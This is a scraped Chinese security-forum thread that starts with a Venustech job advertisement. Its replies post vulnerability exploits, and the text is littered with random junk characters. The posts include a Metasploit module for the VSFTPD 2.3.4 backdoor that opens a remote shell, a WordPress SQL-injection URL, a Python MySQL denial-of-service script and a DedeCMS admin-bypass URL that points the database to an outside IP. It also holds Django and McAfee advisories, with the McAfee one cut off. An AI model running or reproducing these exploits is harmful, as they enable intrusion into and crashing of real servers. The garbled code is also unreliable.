最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。
    & k6 }& z: s  V% M/ O7 j4 ~" |7 e2 ?$ ]7 D6 Y

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    # c1 `( y/ ], s8 V+ Y, n2 Q; z安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.$ D. f: X, Z" Z6 h$ X
    精通C语言编程

    2.
    ( `: V, e$ z6 Z8 @$ Z' g- n7 b熟练使用Linux操作系统,精通 Linux下C语言编程

    3.
    & f, x: I1 }" C! W. y1 c1 }) O精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.: V# A  P9 b. d' d  p! z
    熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
    8 ~, \5 I/ {/ Z; M* o. `熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.
    3 K; U! e( I: {# f" l负责产品的系统测试、集成测试工作

    2.
    3 `1 y8 h$ ^' T负责产品用例的编写,执行、修改

    3.+ ^# I! h8 ~/ Z
    负责产品性能的测试

    4.
    * S# L5 D9 h4 v2 b3 k7 d& D负责对外项目的支持和测试工作

    岗位要求:

    1.
    - _5 `7 c" ?+ a9 x* o4 L: P1 t# y掌握基本的tcp/ip知识

    2.8 J- d" I5 m9 W0 g" k) J
    数通基础好

    3.
    0 @, i0 g9 E- h) Y8 d. _! n- c9 \对linux有一定的基础

    4.
    " M% g' `8 m3 R" U+ K掌握数据库的搭建和使用

    5.
    3 [: \& y3 Q: Q- q至少熟悉一种编程语言C/Perl/VBS/TCL

    6.
    & ~* j7 R6 d: d8 i9 P9 z* Y1 x" w熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.
    ' }9 J7 @" p1 ~  k$ H: j+ L# C熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.. q! N3 Y! {, ]) g! D+ x
    对网络安全设备在网络中的部署有一定的认识

    9.! u3 l8 K3 t2 ]% d" t  D
    掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.! b' B4 V2 e2 u6 A8 b1 B/ k
    木&马检测服务、WEB漏洞扫描服务的实施

    2.1 ^. K7 F0 f5 C" ^( _9 |
    对服务客户的技术支持

    3.6 ]; o/ p% z, q6 K& C
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.
    5 ~4 h1 d. G. i: X
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.& N& \, F! [" C, ~) o* S, O  q
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################  w! y$ c# Z. M& @6 m) A

    ) X  ]  o% {4 ~6 S; C
    ; J7 T; J) ]4 P7 D1 V/ p. K" I
    + {/ N* N# h- A* T' Crequire msf/core1 W& ?2 s2 z( \

    0 j+ i1 ?% G4 F( Nclass Metasploit3 < Msf::Exploit::Remote2 z  B" |. r) g0 j* W6 G" e3 }8 |0 `
    Rank = ExcellentRanking
    + f: M: C. J" S) G* _; h0 c
    # h) y' U3 I: c, ^3 n; N8 zinclude Msf::Exploit::Remote::Tcp
    ) {7 K2 S& x$ N* R7 c8 x, }. b; u: `  \
    def initialize(info = {})
    - Q/ @7 b: W5 msuper(update_info(info9 x* V; c" }9 b7 G! q
    Name => VSFTPD v2.3.4 Backdoor Command Execution
    / e! }% S* A) W) ]- H/ O* LDescript_ion => %q{
    # a) X) u8 I6 s/ R4 vThis module exploits a malicious backdoor that was added to the VSFTPD download/ g  q2 u4 b: u* }% G
    archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
    + ~( y. g7 l5 `3 R% o) U1 zJune 30th 2011 and July 1st 2011 according to the most recent information
    - g% \# h  P% a7 M1 Pavailable. This backdoor was removed on July 3rd 2011.
    7 w0 X6 d: C% p/ L# Y}8 E$ C  N3 J8 D; Z. B
    Author => [ hdm mc ]  h9 l1 l/ k8 h0 D9 [
    License => MSF_LICENSE
    , E3 `8 x7 o7 v7 K# {Version => $Revision: 13099 $+ L  s4 f, J8 {7 K9 _% Y! R
    References =>: L% y" K2 {; j3 @: X9 u# L
    [' v  `( [8 E8 t% @7 a1 g+ o5 r; B
    [ URL http://pastebin.com/AetT9sS5]
    5 U. t  p6 l( F6 b# j[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]" }2 Q: X' \/ |- R7 J. C8 h5 |
    ]
    2 Z% _3 v) _' ?+ t% U2 @Privileged => true
    / |. T" g/ H) S2 a, x# kPlatform => [ unix ]
    ; f9 L. J/ C8 JArch => ARCH_CMD
    5 E5 n* M( p  ^  x4 x7 i5 yPayload =>% k! S! |, A6 B$ v2 E
    {
    ; B; d6 m5 X' w+ P) D' G$ X( R9 SSpace => 2000$ n0 i" L$ Y6 ^; v) A
    BadChars => ; p3 ?) x: S, t& M; m. A4 C4 b4 L, [
    DisableNops => true0 A* G) ~$ [+ A  E' ~; B
    Compat =>
    ) V  V, z+ d$ N( M{+ T# h3 A& I5 E# T& _
    PayloadType => cmd_interact5 A% a6 G5 \) g
    ConnectionType => find
    + G( j; S/ s* q9 o}
      W$ K2 d' f' d# B  t) }! N}
    ; l8 i2 l& C# @; `7 ]Targets =>
    1 \& r  H9 M3 N/ R[
    ; C; l9 x4 l, E: C& I% X, t[ Automatic { } ]
    5 t# `& |3 d7 v3 F. V]6 |  ]( x0 r' h+ Y
    DisclosureDate => Jul 3 2011
    1 p; E( u7 o5 K4 p) U) wDefaultTarget => 0))3 K( F  ~" m$ h
    . N% E7 P, M( T: x
    register_options([ Opt::RPORT(21) ] self.class)3 a, w9 o, j2 F9 r' S+ D, m
    end- |4 f7 @) W7 \8 x9 s) A4 a

    % L5 z. N$ p* l9 hdef exploit
    0 x* L% m4 ~. c8 ]& d: }; e
    ' E) {3 w4 B- I) ]2 a9 }% dnsock = self.connect(false {RPORT => 6200}) rescue nil3 o. F9 g- E- z9 \8 e6 E6 `
    if nsock
    . G9 t/ U* [5 B" K4 Rprint_status(The port used by the backdoor bind listener is already open)- b3 m3 |& O" D! P6 e, S
    handle_backdoor(nsock)' X! v0 e+ j# A& ?0 }
    return0 C0 D9 {; s% ?' o5 |- L
    end) ?' S1 [  b& O
    4 a! |' w- `) K$ n# n- \
    # Connect to the FTP service port first
    5 H- E' F: x9 v& @% ?3 nconnect
    1 f9 e- c1 z1 q$ |3 }+ \! v, j* P; B
    $ _; x9 N" v7 @9 Ibanner = sock.get_once(-1 30).to_s
    . {8 Y2 x5 u/ mprint_status(Banner: #{banner.strip})& O7 t) F) S8 T9 F8 h: |- f

    - M2 J5 |4 t- h# b& osock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
    $ R+ t  x( t0 R  z9 l. e4 D2 O)
    * D7 a9 l5 z" n1 s8 c/ I8 Rresp = sock.get_once(-1 30).to_s
    0 {7 ~0 k& L; L% X, r6 f5 h* oprint_status(USER: #{resp.strip})' ?( W; i% \8 q3 ]
    : u; F) n& K3 A7 y* c
    if resp =~ /^530 /0 B5 p. R# _: [+ u: z) W
    print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
    ' [0 ]+ u$ W8 I' N$ r1 jdisconnect* U8 ]1 H* K, c+ D% W
    return
      V2 m/ K7 s$ [' b, @3 Z  bend
    " R4 h9 u* L; j' h: t  o+ o7 X$ d& a& c0 H: y6 w3 K
    if resp !~ /^331 /
    * x/ b( \  ~6 t; z, J% N; x8 iprint_error(This server did not respond as expected: #{resp.strip})
    9 J' X, Y) e! g+ w- [7 adisconnect
    & h- L' ?7 C& d# ^$ Z# Ireturn! x0 s5 L+ C" P) g9 P" x, _4 Y8 b
    end  Q' G7 P0 O( L$ H8 _

    6 X& [* T, t7 N  a" o# o" vsock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}
    ; ^$ P8 q0 _( ?9 W# j; C1 g+ U1 R)7 j) c4 n& p+ B) g, A! e7 q# Q$ c

    2 ?: F' x! M$ U( A4 \' ?( V4 W# Do not bother reading the response from password just try the backdoor
    ; h+ h# _6 k9 V& R+ nnsock = self.connect(false {RPORT => 6200}) rescue nil
      g% H: S8 ^. t+ C. C5 lif nsock1 W4 l4 h. p: E; ^/ s% U1 U; P
    print_good(Backdoor service has been spawned handling...)
    2 `1 O/ ~; @$ u' e9 V0 J1 _4 jhandle_backdoor(nsock)
    6 f) i- ?* p+ G& d, @. k4 t, f8 [return
    9 m3 K2 k5 y8 i/ Vend
    % h/ d' G% l7 S4 V( a+ ~
    3 s* T& L1 ]! Q& H7 ^: Idisconnect
    7 c6 W- ]+ }& x: e4 Q
    % d( T4 h% ]+ c  Pend) j" r/ A8 e' M1 |# @, o& A# c

    : E  a* T$ W% Hdef handle_backdoor(s), u& [0 W( C# v- ~! u& C1 w
    & l  z& t+ }1 O: c0 ~: `
    s.put(id
    - s2 Y  ~- F, A( F)
    6 |2 |/ K& \: U
    ! r' X! p3 W5 b. K8 y4 M, `, G) J$ \r = s.get_once(-1 5).to_s+ Y' }; |1 y2 y2 f! x  p
    if r !~ /uid=/
    . Y! l) A0 ^$ Y# E' _print_error(The service on port 6200 does not appear to be a shell), {# R: ]* z. W" a4 N* c) q3 i
    disconnect(s)* g. h/ ?: e8 T) W2 {6 f# c
    return' Y1 E5 I' [2 N- N' A( @$ Z  `
    end
    ) w9 N' L* X) M# h) d& w& N+ o0 l6 t4 V% x% g& F
    print_good(UID: #{r.strip})
    9 O3 |) \% s/ C: L8 v& c. N( b) v$ ^
    s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
    2 T: @, S, K7 B: P  Yhandler(s)2 J, v) }8 n) H" ^" Z( j+ W
    end2 Q( _" J1 w5 n! a* w2 E! D6 S' b
    : _/ C# [4 c* h7 _
    end复制代码
    1 C* [4 `  Q% x. {' Z9 J/ \/ M2 r2 e* B) A- ~! j. _- t8 `3 X

    " w  u: s  j4 R
    : H2 P" u$ D! f1 z1 a
    ! C3 j; Q/ u% L2 }# F% r+ H2 ^# J1 ]. {7 b3 E1 x3 a/ d

    : W2 w$ x; }* ]/ v3 Q
    2 g8 F0 m. ^7 N1 m- r
    ! |. c. I# P# p4 w; O0 C
    . L7 p" n3 }& C/ d* i) u; Q% U: P7 ^5 D+ Z! w, S6 f- H8 L
    : J+ ?3 N6 i' A  b$ a
    " s' I8 L# L: Z, T

    " d  W2 g  O) f+ H
    : i7 [; Y; }" \
    7 u* N  |) H$ F/ i' X% e% g" m4 E/ G% P: A8 ~% A6 t

    * N& {& Z$ P$ F" ]
    / t1 s$ h  C: J公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:" F* M4 N1 J' Z2 S, k% f
      . b' u) |7 }% ]$ N0 N) o4 i
         $ Y; G8 M* n, s( |. K4 x( Z
      
    2 C# J4 v$ v2 o4 T8 aSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    # ?7 U. K) r! `7 p0 x2 nallows an authenticated user to execute arbitrary SQL commands via the id
    & z; j; x, y1 ?" V1 j8 wparameter to wp-admin/admin.php. ' P! O6 a$ X3 M& [/ ?! e% t
      ' ^  W$ H. |+ S) @9 b9 T
       
    ( E* g* s: O3 h+ i. H- T: _  ; y/ R+ S4 n0 G* a& v. m! y
    2. Proof of Concept:6 @7 K/ L. L( T% d# W4 z9 b, f
      7 O; T4 K' z# ~% N+ |
       ) q: o+ }7 _- {- X5 K* m$ g
      
    # l; \- ~, i$ s. g- Y. ehttp://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
      D3 U# r1 z$ a4 b% a/ H=1 AND SLEEP(10), @) L2 y4 o- n. M

    7 y1 f" l/ t/ F/ l  1 v( r' @6 ~0 r* B9 @# c! n
       
    9 H$ h' D0 N1 H5 |% D% B6 G/ I1 n  
    9 U! {# {: C2 g1 _4 Y& \2 j3. Solution:- O5 n6 \& |- k: I2 d8 h% o
      
    8 M8 d# p- a5 s" {; t7 S: U) N  a  q     
    0 Y+ |; @, w1 Z# q/ w  [5 O4 D  : D/ M8 R5 W- t/ U. P
    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    6 \, d1 N/ v  g0 e4 w2 Q1 Yfor a hotfix.2 A$ T* l, E5 s! j
      ) c& f! ]8 x5 q& P: @! X" @' d. |
       : _/ w" ]% j" b3 M6 @5 }5 ]
      
    2 ~# D& M' U2 ?7 h4. Reference:
    : Z4 h1 `4 e) y  ~  
    # z! ^* G, E) y* `& R- {& p9 J+ I   9 q5 o7 U2 `9 V) M
      
      Z* K4 @+ I8 N6 khttp://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
    / n) o; ]4 Y$ ~! r/ Y& _8 _ction-sqli/, {0 y6 w( |. ]; F) _' A8 g+ }
      1 [/ i% T" ]7 f7 Y! j3 B. X6 I/ I
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429, K4 U4 M2 q& A

    - b: R0 k* e2 h# H
    0 Q: v0 J! }: z% i' X& p* @: w3 K- S  m4 ~) ~" e

    ) y( N0 y* f: k& l
    $ p* ~: B7 i2 L9 M" v3 R( o3 J0 U* ]* z1 ]" n. _
    0 T5 g# i. o3 K, f. y. o: M0 d  a* U
    , @; J7 D$ I& C3 B' \3 A8 a3 v2 Z
    4 f6 y% t, N7 R+ E. y6 U* P6 y6 b; K

    7 m$ C8 ~% }: a% p. U( w* }/ G& g2 T0 b6 X' V

    9 ?6 W5 J8 X1 d- \# Q4 F* P6 I) c" g3 {6 U
    ) f$ C8 p& t( |& c

    / |& U" V9 _; u/ O, @* F' h0 `! }1 G$ d) `) f& r/ E2 u) o. b
    9 j: V# a2 E  p8 U, u# I( _/ D$ w: y
    & w) X# Z' j5 h3 \
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys
    $ A% d! P+ s9 w7 X0 J0 l* i 1 V, `8 D/ S! ~
    print "
    * V5 A; C; G- H, \9 h& C7 [' e2 Y"
    ; ~1 K$ G, m+ D+ R# Nprint "----------------------------------------------------------------"
    9 e4 f" y# o' |" u" x7 K/ zprint "| MySQL 5.5.8 Null Ptr (windows)                                |"' Z8 @# w$ Y/ A. F
    print "| Level Smash the Stack                                         |"
    $ s- U, [: K5 L' F: ^/ a: y; b& {print "----------------------------------------------------------------"8 _8 Q2 V2 U7 D) a- N
    print "! G! h% @! o3 L0 T& \
    "( S5 l4 Y) N: V1 O) g
    + S3 _# n0 W5 P4 H& w
    buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
    / A  B. b3 ]" l4 x2 m, t. c# ^8 U"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
    + ]& T0 b) H/ X3 {% G- q- R3 ?5 e% \ 6 H. N7 C( I& I
    buf2=("x11x00x00x00x03set autocommit30")  r% Z4 `  ]& d% O8 {

    ) B. T) n3 ?% P) X0 [/ `8 t$ Ydef usage():4 }: Q0 b8 l  t" z! ~  \
    print "usage : ./mysql.py <victim_ip>"! {! Q8 Q& e4 ]/ \) V) j
    print "example: ./mysql.py 192.168.1.22"  o0 O2 w3 v* q: v2 U4 }5 h1 ~8 g
    + ]0 f1 {5 v3 P- C% ^

    * U' a# X$ g5 p1 d" {1 I" Fdef main():
    ' n5 `1 s* c6 `* Y) |0 |5 G. Gif len(sys.argv) != 2:
    / J$ h) C7 Z* y$ {# busage()
    # `5 [5 Y; m$ ^( csys.exit()' s# H; n5 O* e
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    ; c; A, i; E! ~: ]7 d4 x 8 h* K) s2 K. S" R; ]* ~
    HOST = sys.argv[1]
    . x' u1 `* U$ V6 kPORT = int(3306)& a- ^/ w0 F$ k' [3 r- o
    s.connect((HOST,PORT))
    " B5 w' T2 f) l$ F+ W$ a2 cprint "
  • Connect"
    " a* C. I: Z6 e( K7 J  R1 T! S. l( Es.send(buf)6 B& }$ w2 o) j5 B
    print "
  • Payload 1 sent"4 [1 L4 y# x' z" K! T" x( J
    s.send(buf2); L" R+ [: e; C
    print "
  • Payload 2 sent
    0 p' R( C/ z; C' R# w", "
  • Run again to ensure it is down... x" v, k/ i$ ?# W$ v0 K
    "
    ; a5 |# ], z3 g1 Z& as.close(). P- H* D2 t- z5 i) r/ q
    ) m" P& p  G" ~9 @$ h6 Z( S# D
    if __name__ == "__main__":: |$ U& g. |: F
    main()
    8 w: ~$ a: V9 \& A
    ' n3 i( o* T2 p; i+ N
    + r, K; H) Y: H8 `9 {
    & S$ D8 O1 S" `. q4 _2 K$ ^, t
    ! r& v3 C! i% A! X/ @) h  t5 B, E: e2 S4 K, c
    " P1 \* {2 i1 S  k. \/ h

    7 |0 W' c: o4 n. X' J" T' V! G3 @7 N; o# x
    4 Z0 }  L/ n/ i: C
    # }" j, X* C2 ~0 `
    - J( J4 ~9 x5 U7 ^1 n

    ; j2 H7 ?; U0 z9 U, r% E  b! D- N) R' F7 G6 l

    . [* j) {' W; ]2 h) U* ^
    * W( Z6 M. h1 i1 _$ [
    6 t3 _0 T- |0 J* P, g* J: Q" F9 A3 X  M  K$ F2 s

    4 j* K6 Q6 u) \: Q; O5 q公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机

    $ |+ C; B; I( F. H! F5 Nhttp://www.sitedir.com.cn/video/4.swf
    7 S6 y' a9 J) a' R/ {# h
    ! D) _+ h' I4 g3 A8 Z/ j) s0 p% g4 f0 j
    $ u$ B5 ]! s2 j7 \  C; t

    0 C, U! R' \& |+ e: N/ r0 Q# B# X* x5 \

    ; U- H! g9 ~2 P1 S6 d  x7 [+ {+ k; \0 Y6 V3 S, b: t

    & m( q4 \7 q$ K+ J3 R) G( j/ y/ K$ }
    ) A7 o/ h8 k* o. Y9 p' n' N/ O% C+ O, h/ m! d. O3 [, |$ M2 Q
    * ]* ^7 t! A! }  ^6 p7 y- M
    5 n/ [' b  P7 u" P9 P- G0 ?
    - U# z. p8 M: ^+ C* x

    $ k& k0 z. ~/ p  ?( q# a2 m: z. X% x% d5 V. X
    ' I& J4 L: ?2 t) u! I5 k0 N

    ! h- z6 j9 K& F0 A
    3 W8 b1 t; y+ R: }公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    ( [3 k& m% M% ~* `% g
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台
    0 G) g% Y" j; ]( ~( J) s- c
    此漏洞的前提是必须得到后台路径才能实现

    + I! [; t5 b9 Z# a. C( n* C7 g
    官方临时解决办法:

    , }! k- X" W; u8 K
    找到include/common.inc.php文件,把:
    2 J! R, A3 v  i6 I8 ]- F
        foreach($_REQUEST as $_k=>$_v)
    / p; _* F& J1 N6 k3 P; Q' S1 V    {! \; u  N* r) l$ ]/ W- p# t
            var_dump($_k);
    / y7 S1 i3 s( p! X2 V. G5 j        if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
    6 g$ G' o, c, X/ T- T        {
    ( D! {6 d: o" Z, j6 V8 P            exit('Request var not allow!');
    + ?% B& {9 s% o2 ^: X# Y        }
    & G: U  J/ u6 S9 t) x! T( O; E. }' H    }
    ) m. _/ @9 A9 y- {6 |
    换成:
    6 W, m& j$ ]. X' s" v/ \& C) u$ \
        //检查和注册外部提交的变量9 i# D7 S& y, N4 |$ V
        function CheckRequest(&amp;$val) {$ i" A. S) Y/ @  J4 ?: j- l& I
            if (is_array($val)) {: T7 |# a; ?1 C
                foreach ($val as $_k=>$_v) {
    + K! j: G0 {# Z                CheckRequest($_k);! ?7 v* t0 {& {- e7 E, [
                    CheckRequest($val[$_k]);
    - L# L& `: n& _5 K& ?( q5 ~# R2 B            }3 Y5 O, M% M5 |, x  A6 a! a& V
            } else  A& r: t$ C/ i; `. Z; c
            {; P( }$ r# s: o1 u3 j9 q
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )$ I6 a2 Z7 k8 x5 t  r
                {
    & Y; ^# K: i+ H0 v4 V  @8 u                exit('Request var not allow!');# x5 G# K6 g  X+ f
                }# M# u) i* J, P9 B$ M; O
            }$ J6 [) a) J& F$ d9 w& F
        }- X  G# I$ ^2 f  d
        CheckRequest($_REQUEST);
    3 Y7 S7 H3 A* n* p. g
    ) ~! q6 Z7 y# \, V2 L' ^

    3 P) z, ?- X' U$ u  S) N
    . F3 \- |- m/ ~2 {/ @5 s# Z# n9 `$ `$ n5 F2 h% @
    % R: u4 e& n/ s8 h% @8 I' D
    - p2 }4 [3 w" i3 i2 F5 X! L2 }

    ) B3 B+ M) N6 l) Q, S/ `
    ; a9 P2 B- E- j# Q) y# r8 f* J2 q' w# G# a; A" G

    ) h" X; j6 v% D. m; a6 H0 n. F  f+ ]% b

    9 D( ?; i' a9 z4 V. B; S3 R
    % h+ I2 E9 t1 C* J5 o: K
    ) @! }; O8 i( b) [* F* O0 a" H: N
    + h1 |; B! {+ ?) q2 y4 |0 T: e4 h9 P3 f9 U; s
    & _3 a: S9 ?1 Y8 Q$ [% y' @* p
    . i& H: ]& J' H) q

    4 ~+ _( z" M& x! `公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>
    8 u0 W3 I& f2 y; x
    / b( m' K( ~! ^8 N: F) B' ]/ p0 p' rhttp://www.sitedir.com.cn/video/8.swf[/quote]3 Y  j5 q) A4 O+ C5 F

    ; U, I2 T0 H+ R: R( h: r1 H& \1 }$ ?; r  O, X

    8 x0 \$ ^- A: Q0 w% Q% o7 F; B( _( \% [) V) c  m8 s& o! P

    9 S' W: @$ F+ e1 ]9 G  H) C1 n$ Y7 j) _

    / |' p! r3 C0 b; I6 S7 n" K: ~3 O/ _  k8 w

    4 K6 H# _6 P0 X7 v" n; w$ l4 T, U( r. z! j- d( v" t4 ?8 |
    ' ]6 X+ i" M, G3 @1 f: e* W, A+ H

    + L9 S# N: O, }2 d5 G
    4 f" x- S" `. A  H5 s2 q  }; m, B$ ^( l( J' J4 B& e' I: x

    / I' L" D# w" }( p. P% R. g
    4 u5 Y7 s) e* T/ b! h+ N3 T+ ?/ P3 `
    ; }5 L% p: n( l
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    2 `; q9 V! v0 {# B9 M
    影响版本:
    ' m( ^; C) ?- w$ E- V7 e8 |Django 1.2.5
    0 s1 @2 b/ }. Q1 C. y0 X* s2 PDjango 1.3 beta 1* W5 p% f, }. i) v- a$ o1 X+ P0 V
    Django 1.2.4
    % Y' Q7 ^0 ^3 f9 WDjango 1.2.2* q4 }6 U; c/ b+ z3 [
    Django 1.2

    6 K; F7 C! ]2 {# C9 M
    漏洞描述:
    / o/ N5 B; I3 `( t
    Django是一款开放源代码的Web应用框架,由Python写成。
    ; w) t, M+ n* }' x5 N; fDjango存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。7 g% E8 o) F7 z/ a
    1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
    ; T. Y" L! V! A* ]  ^( w2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。  W$ n. ~) U( s& s" O+ c- d
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。
    3 \; H- Q2 o8 y# I; _4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。

      H+ O9 E( [4 S. n  I
    细节参考:
    % z: W( U1 w3 B" i6 jhttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    7 z/ |6 d5 K- M$ @http://secunia.com/advisories/45939/
    2 G  i/ e( I! I" k2 h' p& @

    3 L& b4 i% d: K* \
    * Y' j' k7 ]& d# h3 n1 [2 C3 s) a8 v0 X, L# R* e
    + y% C1 W! F. D0 U9 ~( ?. Z& @

    5 ?5 B" @. h7 J: h
    " q( [) O, d* I" Y& o# K& A4 C+ C7 y! ?- x6 p+ r' S* u
    ) X3 S6 D& {! B7 E9 j
    9 a8 ^; t% k1 ^; I4 V

      p7 f: J& Y7 f! b3 [( ^& T
    , [; n3 d: M4 m& Q0 Q3 |% Z+ |, u: s, \1 z* {. A' k6 Y
    + n4 H# T6 f% U( o; M) ?- T8 W- }

    # i- W) _, {  Q0 A9 s3 E9 f
    - G  \  k/ T( R4 p& V8 K  b5 E9 e6 g: x6 f
    9 Q8 ]* r5 U5 ?/ \. `! K/ x6 q; ?: x
    - i& D. P2 ~, x5 M

    / m5 ^& ?) x8 ~9 r7 |1 {' f公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code+ `/ j( G; M6 t7 i' `
    影响版本: McAfee LinuxShield <= 1.5.1, X5 |6 U' `7 ?0 B
    远程攻击: Yes
    / J& {" G- o7 c7 k% A, }本地溢出: Yes4 T) q" E( d( G1 C" N
    背景阅读:9 h9 F/ W0 V* `
    ===========
    7 y( m. g  i, e( i1 |! l8 b2 G7 \: F% v1 U$ h/ t  m) N: j& F
    LinuxShield detects and removes viruses and other potentially unwanted* F  ~: U5 T" a5 v: q8 w
    software on Linux-based systems. LinuxShield uses the powerful McAfee4 S$ }5 G! R" J& ^- T1 ?
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our
    5 p( }( C7 i4 |1 Janti-virus products.8 \+ L: h3 q; j. D! P$ K5 {
    # t  m, m3 `" {+ ?
    Although a few years ago, the Linux operating system was considered a
    % x! u4 Y6 B. `7 Q) x# _2 tsecure environment, it is now seeing more occurrences of software$ M9 ^  J' v+ @. g* P* V; g
    specifically written to attack or exploit security weaknesses in
    ' W; ]2 ?$ M' N' U: RLinux-based systems. Increasingly, Linux-based systems interact with
    # f% K/ U3 w/ i' l4 y6 ~Windows-based computers. Although viruses written to attack Windows-% U0 d4 N& l0 U$ i! g* ?/ i, h
    based systems do not directly attack Linux systems, a Linux server, i$ w1 F5 D/ i8 h3 g" ]' P9 q
    can harbor these viruses, ready to infect any client that connects to+ q, V/ F) B  O. S% a  H- Z
    it.0 T6 Q' z9 A3 F& S3 B

    2 F: Y( e" y& ?$ d; R- h. WWhen installed on your Linux systems, LinuxShield provides protection
    4 a8 {8 r: }# O/ _4 jagainst viruses, Trojan horses, and other types of potentially; |  ]# E9 B# {
    unwanted software.: F0 F5 R! |# g" H# [
    ( x9 J0 E9 x- ^9 J  Y3 Y; s7 T
    LinuxShield scans files as they are opened and closed
    9 q% P( Q+ ^. R6 y! {?&amp;#65533;&amp;#65533; a technique
    2 p3 {& @8 {0 i" q0 \. Jknown as on-access scanning. LinuxShield also incorporates an
    . q9 A) k- ~: `4 don-demand scanner that enables you to scan any directory or file in" n1 z* D6 e! n. T8 ]
    your host at any time.
    2 n  o. \& P! u. q2 S( e$ @1 m) W8 P0 J4 ^
    When kept up-to-date with the latest virus-definition (DAT) files,
    3 T* q( O. A  B8 y9 m& h- jLinuxShield is an important part of your network security. We
    * O% X% W1 {3 Y! d0 @recommend that you set up an anti-virus security policy for your7 A. k$ B4 W3 o& N1 C
